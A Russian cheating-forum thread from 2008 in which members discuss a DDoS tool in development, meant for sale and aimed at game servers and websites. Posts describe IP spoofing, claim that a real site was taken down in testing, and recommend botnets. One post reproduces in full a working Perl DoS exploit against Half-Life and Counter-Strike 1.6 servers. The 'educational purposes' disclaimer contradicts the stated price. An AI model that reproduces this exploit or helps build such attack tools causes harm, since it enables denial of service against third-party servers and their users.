Логотип игрового форума RF-Cheats.ru    
Новости онлайн игр Правила форума Чёрный рынок Реклама и привилегии Гаранты Арбитраж

Вернуться   RF-Cheats.ru - форум читеров и ботоводов > > > > >
Читы и обход фроста для RF Online без хайдаБоты и читы для Perfect World бесплатно без хайдаМоды и читы для World of Tanks (WoT) бесплатно без хайдаМоды и читы для Armored Warfare бесплатно без хайдаБоты и читы для DOTA 2 бесплатно без хайдаБоты и читы для Black Desert Online бесплатно без хайдаЧиты на ArcheAge бесплатно без хайдаЧиты для Warface бесплатно без хайдаВзлом ВКонтакте и ОдноклассниковСписок разделов со всеми играмиЧиты для онлайн игр

Закрытая тема

Опции темы
Старый 20.07.2008, 23:17   #11
n1fr1t
Модератор раздела Requiem Online
Благодарностей:
304 всего
Отправить сообщение для n1fr1t с помощью ICQ Отправить сообщение для n1fr1t с помощью Skype™

Цитата:
Сообщение от APuK Посмотреть сообщение
что такое ДДоСер???
http://ru.wikipedia.org/wiki/DoS-%D0...B0%D0%BA%D0%B0

=)

Цитата:
Сообщение от WareZzz Посмотреть сообщение
чтото программа уже не похожа на чит прогу а похожа на утилиты хакера
+1

Старый 21.07.2008, 00:10   #12
Co01eR
Читер
Благодарностей:
195 всего

Цитата:
Сообщение от APuK Посмотреть сообщение
что такое ДДоСер???
Код:
DDoS программа, которая легко укладывает сайты

Старый 21.07.2008, 17:47   #13
demo
Читер со стажем
Благодарностей:
726 всего
Отправить сообщение для demo с помощью ICQ

Пока ещё ведутся работы по разработке ДДоСа, делаю немного другую версию сейчас, которая будет безпалевная, будет слать с рандомных ипов и портов на определённый/рандомный ип/порт... возможно если будет широкий канал то можно будет класть и севера КС, РФО (у которых слабый канал) и некоторые другие, где не оч широкие каналы.

Пока веду работы ссылки небудет, потому что у меня толком сама программа недоделана. + ещё многое для рфо сделать надо, хочу в сниффер сделать декодер пакетов рфо... но это для мну пока слишком сложно. + ещё надо улучшить систему защиты программы, ибо ддос - зло!

Позже будет списо бета тестеров и друзей кто получит как полную, так и урезанную версию.

Попробуй убей меня тут!

Приложение для андроид для игроков руоффа: https://market.android.com/details?i...rfstatuserfree

Сказали спасибо:
mikoxxx (15.08.2008)
Старый 21.07.2008, 17:55   #14
rule-z
Гильдия RF-Cheats
Благодарностей:
1,455 всего
Отправить сообщение для rule-z с помощью ICQ

Так народ, прога не доделана, и на данный момент, демо делает все чтобы в будущем прога более менее была кул. Пока думаю с покупкой не надо маяться, так как пока прогу ни каму не дадут. Зы ддос ето когда с одного порта\ипа\сети исходят различные пакеты. К примеру стоит у нас мини сервак кс. Начинаем ддос атаку. Сервер (комп где стоит сервак) не спроавляется с таким обьемом данных приходящих на него и мы тупо забиваем канал. В такой ситуации может случиться многое: либо сервак упадет (что больше вероятно) либо у пользователей случатся другие проблемы. Крупные сервера обычно в один канал не повалишь,поетому ддосеры обьединяются в группы, и с разных ипов в одно и то же время начинают ддосить серв. Как говорится в нашем мире нет ничего невозможного. Ибо демон Девид блейн всегда нам поможет........
Зы. серег надеюсь ты сможешь доделать ее, кста как операция?

silence is golden

Старый 21.07.2008, 18:15   #15
demo
Читер со стажем
Благодарностей:
726 всего

На правах Офф Топа :) операция кул, местный наркоз и никакого почти отходняка )))

А теперь по теме, название проекта я меняю. Думаю сделать ещё полностью фри версию, но там почти ничего не будет, так, просто нубов потешить, да и рекламку сделать.

Предполагаемое название RF_MegaHack

Попробуй убей меня тут!

Приложение для андроид для игроков руоффа: https://market.android.com/details?i...rfstatuserfree

Старый 21.07.2008, 18:20   #16
n1fr1t
Модератор раздела Requiem Online
Благодарностей:
304 всего
Отправить сообщение для n1fr1t с помощью ICQ Отправить сообщение для n1fr1t с помощью Skype™

Поздравляю.
Фриверсия для нубов - скриншот программы ? :9:

Старый 21.07.2008, 19:57   #17
Co01eR
Читер
Благодарностей:
195 всего

ааа укладывание кс сервов )))жесть:9:

Старый 21.07.2008, 23:38   #18
demo
Читер со стажем
Благодарностей:
726 всего

именно поэтому и цена будет на полную версию не малая, думаю минимум 500р. да и защиту сейчас буду делать по полной программе, с онлайн верификацией. по какой системме рассказывать не буду, но говорю сразу, что не по той что описана на этом форуме в разделе делфи. у меня будет более сложная, которую будет не так легко взломать, да и не думаю что двойную взломают, а если ещё и 3 получится, то будет как бот, которого не взломали

Добавлено через 2 часа 54 минуты
Хм... после тестов выяснилось, что абусс положить не получилось... будут вестись работы по выявлению причины и фиксу. зато варзон51.ру лёг за пару секунд.

Последний раз редактировалось demo; 22.07.2008 в 02:33. Причина: Добавлено сообщение

Попробуй убей меня тут!

Старый 22.07.2008, 03:34   #19
Няшкин
Постоялец
Благодарностей:
514 всего
Отправить сообщение для Няшкин с помощью Skype™

demo, я на форум выкладывал пример простой верификации (его принцып).

чтоб КС положыть вот скриптиГ на перле
Код:
#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362   58af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
з.ы. хороший DDos должет работать с сетью ботнета...

DoS-атака (от англ. Denial of Service — «отказ в обслуживании») и DDoS-атака (Distributed Denial of Service — «распределённый отказ обслуживания») — это разновидности атак злоумышленника на компьютерные системы. Целью этих атак является создание таких условий, при которых легитимные (правомерные) пользователи системы не могут получить доступ к предоставляемым системой ресурсам, либо этот доступ затруднён.

Ботнет (англ. botnet) — это компьютерная сеть, состоящая из некоторого количества хостов, с запущенными ботами — автономным программным обеспечением. Чаще всего бот в составе ботнета является скрытно устанавливаемым на компьютере жертвы и позволяющим злоумышленнику выполнять некие действия с использованием ресурсов заражённого компьютера программным обеспечением. Обычно используются для нелегальной или неодобряемой деятельности — рассылки спама, перебора паролей на удалённой системе, атак на отказ в обслуживании.

Старый 22.07.2008, 04:58   #20
demo
Читер со стажем
Благодарностей:
726 всего

Варез, то что ты выкладывал это конечно хорошо, но мы с тобой ещё в асе спишемся, кое какие мысли есть по поводу верификации, как усложнить её, и улучшить. по поводу укладки серва кс... ну кс класть нет смысла, а вот серв рфо огромный, и над этим работаю.

П.С. Программа разрабатывается не для применения её в корыстных целях, а лишь для указания админам на их недочёты, дыры и прочее. Автор (т.е. я) не несёт ответственности ни за что! Разрабатывается в учебных целях, не для реального применения со своей стороны и не для продажи.
п.п.с хотя ключ только за донат будет. причём с ддосом донат будет не слабый.

Попробуй убей меня тут!

Закрытая тема

Опции темы